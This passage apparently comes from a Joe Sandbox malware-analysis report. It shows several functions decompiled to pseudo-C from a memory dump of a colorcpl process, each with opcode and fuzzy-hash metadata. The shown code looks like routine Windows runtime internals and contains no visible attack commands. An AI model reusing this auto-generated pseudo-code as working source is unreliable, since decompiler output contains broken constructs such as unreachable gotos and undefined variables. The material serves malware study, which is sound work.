                                                                                                								_t97 =  *0x7ffe000c;
                                                                                                								_t90 =  *0x7FFE0008;
                                                                                                								if(_t97 ==  *_t103) {
                                                                                                									goto L10;
                                                                                                								}
                                                                                                								asm("pause");
                                                                                                							}
                                                                                                							L10:
                                                                                                							_t79 = _v24;
                                                                                                							_t99 = 0x7ffe03b0;
                                                                                                							_v12 =  *0x7ffe03b0;
                                                                                                							_t72 =  *0x7FFE03B4;
                                                                                                							_t103 = 0x7ffe0010;
                                                                                                							_v36 = _t72;
                                                                                                						} while (_v20 != _v12 || _t79 != _t72);
                                                                                                						_t73 =  *0x6f08628; // 0x0
                                                                                                						_t105 = _v28;
                                                                                                						_t80 =  *0x6f0862c; // 0x0
                                                                                                					} while (_t105 != _t73 || _v32 != _t80);
                                                                                                					_t98 = _v40;
                                                                                                					asm("sbb edx, [ebp-0x20]");
                                                                                                					_t88 = _t90 - _v12 - _t105;
                                                                                                					_t75 = _a4;
                                                                                                					asm("sbb edx, eax");
                                                                                                					_t31 = _t98 + 0xc8; // 0x6edfb53
                                                                                                					_t101 = _t31;
                                                                                                					 *_t101 = _t88;
                                                                                                					_t101[1] = _t97;
                                                                                                					goto L15;
                                                                                                				}
                                                                                                			}










































                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b846dd8da2e5774de0ee4db6c1c5d8b0da65c39c135bfdb74881a533e28436a4
                                                                                                • Instruction ID: 20fad7a23f6044b33918b51dfa43626aed0df0a330fb9e17142c25cdf4f2a0a5
                                                                                                • Opcode Fuzzy Hash: b846dd8da2e5774de0ee4db6c1c5d8b0da65c39c135bfdb74881a533e28436a4
                                                                                                • Instruction Fuzzy Hash: C05190B1E00725CFCB94DFA8C8846AEB7F6BF48314F219659D559AB340DB30A944CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 96%
                                                                                                			E06E2EF40(intOrPtr __ecx) {
                                                                                                				char _v5;
                                                                                                				char _v6;
                                                                                                				char _v7;
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t58;
                                                                                                				char _t59;
                                                                                                				signed char _t69;
                                                                                                				void* _t73;
                                                                                                				signed int _t74;
                                                                                                				char _t79;
                                                                                                				signed char _t81;
                                                                                                				signed int _t85;
                                                                                                				signed int _t87;
                                                                                                				intOrPtr _t90;
                                                                                                				signed char* _t91;
                                                                                                				void* _t92;
                                                                                                				signed int _t94;
                                                                                                				void* _t96;
                                                                                                
                                                                                                				_t90 = __ecx;
                                                                                                				_v16 = __ecx;
                                                                                                				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                                                					_t58 =  *((intOrPtr*)(__ecx));
                                                                                                					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                                                						E06E19080(_t73, __ecx, __ecx, _t92);
                                                                                                					}
                                                                                                				}
                                                                                                				_t74 = 0;
                                                                                                				_t96 =  *0x7ffe036a - 1;
                                                                                                				_v12 = 0;
                                                                                                				_v7 = 0;
                                                                                                				if(_t96 > 0) {
                                                                                                					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                                                					_v12 = _t74;
                                                                                                					_v7 = _t96 != 0;
                                                                                                				}
                                                                                                				_t79 = 0;
                                                                                                				_v8 = 0;
                                                                                                				_v5 = 0;
                                                                                                				while(1) {
                                                                                                					L4:
                                                                                                					_t59 = 1;
                                                                                                					L5:
                                                                                                					while(1) {
                                                                                                						if(_t59 == 0) {
                                                                                                							L12:
                                                                                                							_t21 = _t90 + 4; // 0x7709c21e
                                                                                                							_t87 =  *_t21;
                                                                                                							_v6 = 0;
                                                                                                							if(_t79 != 0) {
                                                                                                								if((_t87 & 0x00000002) != 0) {
                                                                                                									goto L19;
                                                                                                								}
                                                                                                								if((_t87 & 0x00000001) != 0) {
                                                                                                									_v6 = 1;
                                                                                                									_t74 = _t87 ^ 0x00000003;
                                                                                                								} else {
                                                                                                									_t51 = _t87 - 2; // -2
                                                                                                									_t74 = _t51;
                                                                                                								}
                                                                                                								goto L15;
                                                                                                							} else {
                                                                                                								if((_t87 & 0x00000001) != 0) {
                                                                                                									_v6 = 1;
                                                                                                									_t74 = _t87 ^ 0x00000001;
                                                                                                								} else {
                                                                                                									_t26 = _t87 - 4; // -4
                                                                                                									_t74 = _t26;
                                                                                                									if((_t74 & 0x00000002) == 0) {
                                                                                                										_t74 = _t74 - 2;
                                                                                                									}
                                                                                                								}
                                                                                                								L15:
                                                                                                								if(_t74 == _t87) {
                                                                                                									L19:
                                                                                                									E06E12D8A(_t74, _t90, _t87, _t90);
                                                                                                									_t74 = _v12;
                                                                                                									_v8 = 1;
                                                                                                									if(_v7 != 0 && _t74 > 0x64) {
                                                                                                										_t74 = _t74 - 1;
                                                                                                										_v12 = _t74;
                                                                                                									}
                                                                                                									_t79 = _v5;
                                                                                                									goto L4;
                                                                                                								}
                                                                                                								asm("lock cmpxchg [esi], ecx");
                                                                                                								if(_t87 != _t87) {
                                                                                                									_t74 = _v12;
                                                                                                									_t59 = 0;
                                                                                                									_t79 = _v5;
                                                                                                									continue;
                                                                                                								}
                                                                                                								if(_v6 != 0) {
                                                                                                									_t74 = _v12;
                                                                                                									L25:
                                                                                                									if(_v7 != 0) {
                                                                                                										if(_t74 < 0x7d0) {
                                                                                                											if(_v8 == 0) {
                                                                                                												_t74 = _t74 + 1;
                                                                                                											}
                                                                                                										}
                                                                                                										_t38 = _t90 + 0x14; // 0x0
                                                                                                										_t39 = _t90 + 0x14; // 0x0
                                                                                                										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                                                										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                											_t85 = _t85 & 0xff000000;
                                                                                                										}
                                                                                                										 *(_t90 + 0x14) = _t85;
                                                                                                									}
                                                                                                									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                                                									return 0;
                                                                                                								}
                                                                                                								_v5 = 1;
                                                                                                								_t87 = _t74;
                                                                                                								goto L19;
                                                                                                							}
                                                                                                						}
                                                                                                						_t94 = _t74;
                                                                                                						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                                                						if(_t74 == 0) {
                                                                                                							goto L12;
                                                                                                						} else {
                                                                                                							_t91 = _t90 + 4;
                                                                                                							goto L8;
                                                                                                							L9:
                                                                                                							while((_t81 & 0x00000001) != 0) {
                                                                                                								_t69 = _t81;
                                                                                                								asm("lock cmpxchg [edi], edx");
                                                                                                								if(_t69 != _t81) {
                                                                                                									_t81 = _t69;
                                                                                                									continue;
                                                                                                								}
                                                                                                								_t90 = _v16;
                                                                                                								goto L25;
                                                                                                							}
                                                                                                							asm("pause");
                                                                                                							_t94 = _t94 - 1;
                                                                                                							if(_t94 != 0) {
                                                                                                								L8:
                                                                                                								_t81 =  *_t91;
                                                                                                								goto L9;
                                                                                                							} else {
                                                                                                								_t90 = _v16;
                                                                                                								_t79 = _v5;
                                                                                                								goto L12;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}





























                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                • Instruction ID: 506a36d1ebec4ee2e7e8d4f8b5a8f72f6ff289c0e22d71e9bf3c8873fc323c24
                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                • Instruction Fuzzy Hash: 6851F530E0436ADFEB90CB64D1D0BEEBBB3AF05318F2891A8C44557281D375A989C791
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E06EE740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                                                				signed short* _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _t55;
                                                                                                				void* _t56;
                                                                                                				intOrPtr* _t66;
                                                                                                				intOrPtr* _t69;
                                                                                                				void* _t74;
                                                                                                				intOrPtr* _t78;
                                                                                                				intOrPtr* _t81;
                                                                                                				intOrPtr* _t82;
                                                                                                				intOrPtr _t83;
                                                                                                				signed short* _t84;
                                                                                                				intOrPtr _t85;
                                                                                                				signed int _t87;
                                                                                                				intOrPtr* _t90;
                                                                                                				intOrPtr* _t93;
                                                                                                				intOrPtr* _t94;
                                                                                                				void* _t98;
                                                                                                
                                                                                                				_t84 = __edx;
                                                                                                				_t80 = __ecx;
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t55 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t87 =  *__edx & 0x0000ffff;
                                                                                                				_v12 = __ecx;
                                                                                                				_t3 = _t55 + 0x154; // 0x154
                                                                                                				_t93 = _t3;
                                                                                                				_t78 =  *_t93;
                                                                                                				_t4 = _t87 + 2; // 0x2
                                                                                                				_t56 = _t4;
                                                                                                				while(_t78 != _t93) {
                                                                                                					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                                                						L4:
                                                                                                						_t78 =  *_t78;
                                                                                                						continue;
                                                                                                					} else {
                                                                                                						_t7 = _t78 + 0x18; // 0x18
                                                                                                						if(E06E6D4F0(_t7, _t84[2], _t87) == _t87) {
                                                                                                							_t40 = _t78 + 0xc; // 0xc
                                                                                                							_t94 = _t40;
                                                                                                							_t90 =  *_t94;
                                                                                                							while(_t90 != _t94) {
                                                                                                								_t41 = _t90 + 8; // 0x8
                                                                                                								_t74 = E06E5F380(_a4, _t41, 0x10);
                                                                                                								_t98 = _t98 + 0xc;
                                                                                                								if(_t74 != 0) {
                                                                                                									_t90 =  *_t90;
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L12;
                                                                                                							}
                                                                                                							_t82 = L06E34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                							if(_t82 != 0) {
                                                                                                								_t46 = _t78 + 0xc; // 0xc
                                                                                                								_t69 = _t46;
                                                                                                								asm("movsd");
                                                                                                								asm("movsd");
                                                                                                								asm("movsd");
                                                                                                								asm("movsd");
                                                                                                								_t85 =  *_t69;
                                                                                                								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                									L20:
                                                                                                									_t82 = 3;
                                                                                                									asm("int 0x29");
                                                                                                								}
                                                                                                								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                                                								 *_t82 = _t85;
                                                                                                								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                                                								 *_t69 = _t82;
                                                                                                								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                                                								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                                                								goto L11;
                                                                                                							} else {
                                                                                                								L18:
                                                                                                								_push(0xe);
                                                                                                								_pop(0);
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t84 = _v8;
                                                                                                							_t9 = _t87 + 2; // 0x2
                                                                                                							_t56 = _t9;
                                                                                                							goto L4;
                                                                                                						}
                                                                                                					}
                                                                                                					L12:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t10 = _t87 + 0x1a; // 0x1a
                                                                                                				_t78 = L06E34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                                                				if(_t78 == 0) {
                                                                                                					goto L18;
                                                                                                				} else {
                                                                                                					_t12 = _t87 + 2; // 0x2
                                                                                                					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                                                					_t16 = _t78 + 0x18; // 0x18
                                                                                                					E06E5F3E0(_t16, _v8[2], _t87);
                                                                                                					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                                                					_t19 = _t78 + 0xc; // 0xc
                                                                                                					_t66 = _t19;
                                                                                                					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                                                					 *_t66 = _t66;
                                                                                                					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                                                					_t81 = L06E34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                					if(_t81 == 0) {
                                                                                                						goto L18;
                                                                                                					} else {
                                                                                                						_t26 = _t78 + 0xc; // 0xc
                                                                                                						_t69 = _t26;
                                                                                                						asm("movsd");
                                                                                                						asm("movsd");
                                                                                                						asm("movsd");
                                                                                                						asm("movsd");
                                                                                                						_t85 =  *_t69;
                                                                                                						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                							goto L20;
                                                                                                						} else {
                                                                                                							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                                                							 *_t81 = _t85;
                                                                                                							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                                                							 *_t69 = _t81;
                                                                                                							_t83 = _v12;
                                                                                                							 *(_t78 + 8) = 1;
                                                                                                							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                							_t34 = _t83 + 0x154; // 0x1ba
                                                                                                							_t69 = _t34;
                                                                                                							_t85 =  *_t69;
                                                                                                							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                								goto L20;
                                                                                                							} else {
                                                                                                								 *_t78 = _t85;
                                                                                                								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                                                								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                                                								 *_t69 = _t78;
                                                                                                								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                							}
                                                                                                						}
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                				goto L12;
                                                                                                			}






















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                • Instruction ID: 84a8e86679dab1b6bb9b5f12b6ddede42d4c21b60f3d5c0c83f0d5aa5012db81
                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                • Instruction Fuzzy Hash: 2F518B71A00606EFDB55CF54C880A96BBF9FF45308F15C0AAE9089F256E371E94ACB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E06E42990() {
                                                                                                				signed int* _t62;
                                                                                                				signed int _t64;
                                                                                                				intOrPtr _t66;
                                                                                                				signed short* _t69;
                                                                                                				intOrPtr _t76;
                                                                                                				signed short* _t79;
                                                                                                				void* _t81;
                                                                                                				signed int _t82;
                                                                                                				signed short* _t83;
                                                                                                				signed int _t87;
                                                                                                				intOrPtr _t91;
                                                                                                				void* _t98;
                                                                                                				signed int _t99;
                                                                                                				void* _t101;
                                                                                                				signed int* _t102;
                                                                                                				void* _t103;
                                                                                                				void* _t104;
                                                                                                				void* _t107;
                                                                                                
                                                                                                				_push(0x20);
                                                                                                				_push(0x6eeff00);
                                                                                                				E06E6D08C(_t81, _t98, _t101);
                                                                                                				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                                                				_t99 = 0;
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                                                				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                                                				if(_t82 == 0) {
                                                                                                					_t62 = 0xc0000100;
                                                                                                				} else {
                                                                                                					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                                                					_t102 = 0xc0000100;
                                                                                                					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                                                					_t64 = 4;
                                                                                                					while(1) {
                                                                                                						 *(_t103 - 0x24) = _t64;
                                                                                                						if(_t64 == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t87 = _t64 * 0xc;
                                                                                                						 *(_t103 - 0x2c) = _t87;
                                                                                                						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x6df1664));
                                                                                                						if(_t107 <= 0) {
                                                                                                							if(_t107 == 0) {
                                                                                                								_t79 = E06E5E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x6df1668)), _t82);
                                                                                                								_t104 = _t104 + 0xc;
                                                                                                								__eflags = _t79;
                                                                                                								if(__eflags == 0) {
                                                                                                									_t102 = E06E951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x6df166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                                									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                                                									break;
                                                                                                								} else {
                                                                                                									_t64 =  *(_t103 - 0x24);
                                                                                                									goto L5;
                                                                                                								}
                                                                                                								goto L13;
                                                                                                							} else {
                                                                                                								L5:
                                                                                                								_t64 = _t64 - 1;
                                                                                                								continue;
                                                                                                							}
                                                                                                						}
                                                                                                						break;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                					__eflags = _t102;
                                                                                                					if(_t102 < 0) {
                                                                                                						__eflags = _t102 - 0xc0000100;
                                                                                                						if(_t102 == 0xc0000100) {
                                                                                                							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                                							__eflags = _t83;
                                                                                                							if(_t83 != 0) {
                                                                                                								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                                                								__eflags =  *_t83 - _t99;
                                                                                                								if( *_t83 == _t99) {
                                                                                                									_t102 = 0xc0000100;
                                                                                                									goto L19;
                                                                                                								} else {
                                                                                                									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                                                									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                                                									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                                                									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                                                										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                                                										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                                                											L26:
                                                                                                											_t102 = E06E42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                                											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                											__eflags = _t102 - 0xc0000100;
                                                                                                											if(_t102 != 0xc0000100) {
                                                                                                												goto L12;
                                                                                                											} else {
                                                                                                												_t99 = 1;
                                                                                                												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                                                												goto L18;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t69 = E06E26600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                                                											__eflags = _t69;
                                                                                                											if(_t69 != 0) {
                                                                                                												goto L26;
                                                                                                											} else {
                                                                                                												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                                												goto L18;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										L18:
                                                                                                										_t102 = E06E42C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                                                										L19:
                                                                                                										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								}
                                                                                                								L28:
                                                                                                							} else {
                                                                                                								E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                                                								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                                                								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                                                								_t76 = E06E42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                                                								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                                                								__eflags = _t76 - 0xc0000100;
                                                                                                								if(_t76 == 0xc0000100) {
                                                                                                									 *((intOrPtr*)(_t103 - 0x1c)) = E06E42C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                                                								}
                                                                                                								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                                                								E06E42ACB();
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					L12:
                                                                                                					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                                                					_t62 = _t102;
                                                                                                				}
                                                                                                				L13:
                                                                                                				return E06E6D0D1(_t62);
                                                                                                				goto L28;
                                                                                                			}






















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • Opcode ID: 31d104d7c2e7a3e03ac3bf377c9dd7f028197ecad52dba1f3fd57b92b61e9706
                                                                                                • Instruction ID: 23b2a045acb13dcf41276a58660f13c44e3d3469289951e5e21672bf64056b0c
                                                                                                • Opcode Fuzzy Hash: 31d104d7c2e7a3e03ac3bf377c9dd7f028197ecad52dba1f3fd57b92b61e9706
                                                                                                • Instruction Fuzzy Hash: 02516771A00319DFDFA5EF65D880ADEBBB6BF48314F059055FA18AB250C7318A52DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E06E44D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                				signed int _v12;
                                                                                                				char _v176;
                                                                                                				char _v177;
                                                                                                				char _v184;
                                                                                                				intOrPtr _v192;
                                                                                                				intOrPtr _v196;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed short _t42;
                                                                                                				char* _t44;
                                                                                                				intOrPtr _t46;
                                                                                                				intOrPtr _t50;
                                                                                                				char* _t57;
                                                                                                				intOrPtr _t59;
                                                                                                				intOrPtr _t67;
                                                                                                				signed int _t69;
                                                                                                
                                                                                                				_t64 = __edx;
                                                                                                				_v12 =  *0x6f0d360 ^ _t69;
                                                                                                				_t65 = 0xa0;
                                                                                                				_v196 = __edx;
                                                                                                				_v177 = 0;
                                                                                                				_t67 = __ecx;
                                                                                                				_v192 = __ecx;
                                                                                                				E06E5FA60( &_v176, 0, 0xa0);
                                                                                                				_t57 =  &_v176;
                                                                                                				_t59 = 0xa0;
                                                                                                				if( *0x6f07bc8 != 0) {
                                                                                                					L3:
                                                                                                					while(1) {
                                                                                                						asm("movsd");
                                                                                                						asm("movsd");
                                                                                                						asm("movsd");
                                                                                                						asm("movsd");
                                                                                                						_t67 = _v192;
                                                                                                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                                                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                                                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                                                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                                                						_push( &_v184);
                                                                                                						_push(_t59);
                                                                                                						_push(_t57);
                                                                                                						_push(0xa0);
                                                                                                						_push(_t57);
                                                                                                						_push(0xf);
                                                                                                						_t42 = E06E5B0B0();
                                                                                                						if(_t42 != 0xc0000023) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if(_v177 != 0) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                						}
                                                                                                						_v177 = 1;
                                                                                                						_t44 = L06E34620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                                                						_t59 = _v184;
                                                                                                						_t57 = _t44;
                                                                                                						if(_t57 != 0) {
                                                                                                							continue;
                                                                                                						} else {
                                                                                                							_t42 = 0xc0000017;
                                                                                                							break;
                                                                                                						}
                                                                                                					}
                                                                                                					if(_t42 != 0) {
                                                                                                						_t65 = E06E1CCC0(_t42);
                                                                                                						if(_t65 != 0) {
                                                                                                							L10:
                                                                                                							if(_v177 != 0) {
                                                                                                								if(_t57 != 0) {
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                								}
                                                                                                							}
                                                                                                							_t46 = _t65;
                                                                                                							L12:
                                                                                                							return E06E5B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                                                						}
                                                                                                						L7:
                                                                                                						_t50 = _a4;
                                                                                                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                                                						if(_t50 != 3) {
                                                                                                							if(_t50 == 2) {
                                                                                                								goto L8;
                                                                                                							}
                                                                                                							L9:
                                                                                                							if(E06E5F380(_t67 + 0xc, 0x6df5138, 0x10) == 0) {
                                                                                                								 *0x6f060d8 = _t67;
                                                                                                							}
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						L8:
                                                                                                						_t64 = _t57 + 0x28;
                                                                                                						E06E44F49(_t67, _t57 + 0x28);
                                                                                                						goto L9;
                                                                                                					}
                                                                                                					_t65 = 0;
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				if(E06E44E70(0x6f086b0, 0x6e45690, 0, 0) != 0) {
                                                                                                					_t46 = E06E1CCC0(_t56);
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					_t59 = 0xa0;
                                                                                                					goto L3;
                                                                                                				}
                                                                                                			}





















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e5ae6441702fb84300a279113dc1e82cbfda29c33e6752506f6b82e0c31c7ef5
                                                                                                • Instruction ID: 58f9ec28c7974dfc5c52a246dea4e737aa0fc68501564784354d99d41a3f90a9
                                                                                                • Opcode Fuzzy Hash: e5ae6441702fb84300a279113dc1e82cbfda29c33e6752506f6b82e0c31c7ef5
                                                                                                • Instruction Fuzzy Hash: 4A41C271B40318DFEBA1EF24DC80FAAB7E9EB05614F045099E9499B2C1D770ED44CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E06E44BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                                                				signed int _v8;
                                                                                                				short _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
